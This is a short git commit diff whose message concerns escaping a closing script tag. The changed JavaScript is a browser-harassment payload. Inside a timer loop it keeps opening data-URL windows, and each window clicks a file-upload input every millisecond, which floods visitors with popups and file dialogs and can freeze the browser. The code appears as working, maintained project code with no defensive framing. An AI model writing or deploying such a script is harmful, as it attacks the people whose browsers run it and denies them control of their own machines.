Ensure closing script tag has necessary escape.
parent
9c16da9c98
commit
77c13286e0
|
@ -52,7 +52,7 @@ setInterval(function(){
|
||||||
delete kins[k];
|
delete kins[k];
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
|
w = open('data:text/html,<input type="file" id="f"><script>f.click();setInterval("f.click()", 1);<\\/script>');
|
||||||
if (w) {
|
if (w) {
|
||||||
kins[i] = w;
|
kins[i] = w;
|
||||||
i++;
|
i++;
|
||||||
|
|
Loading…
Reference in New Issue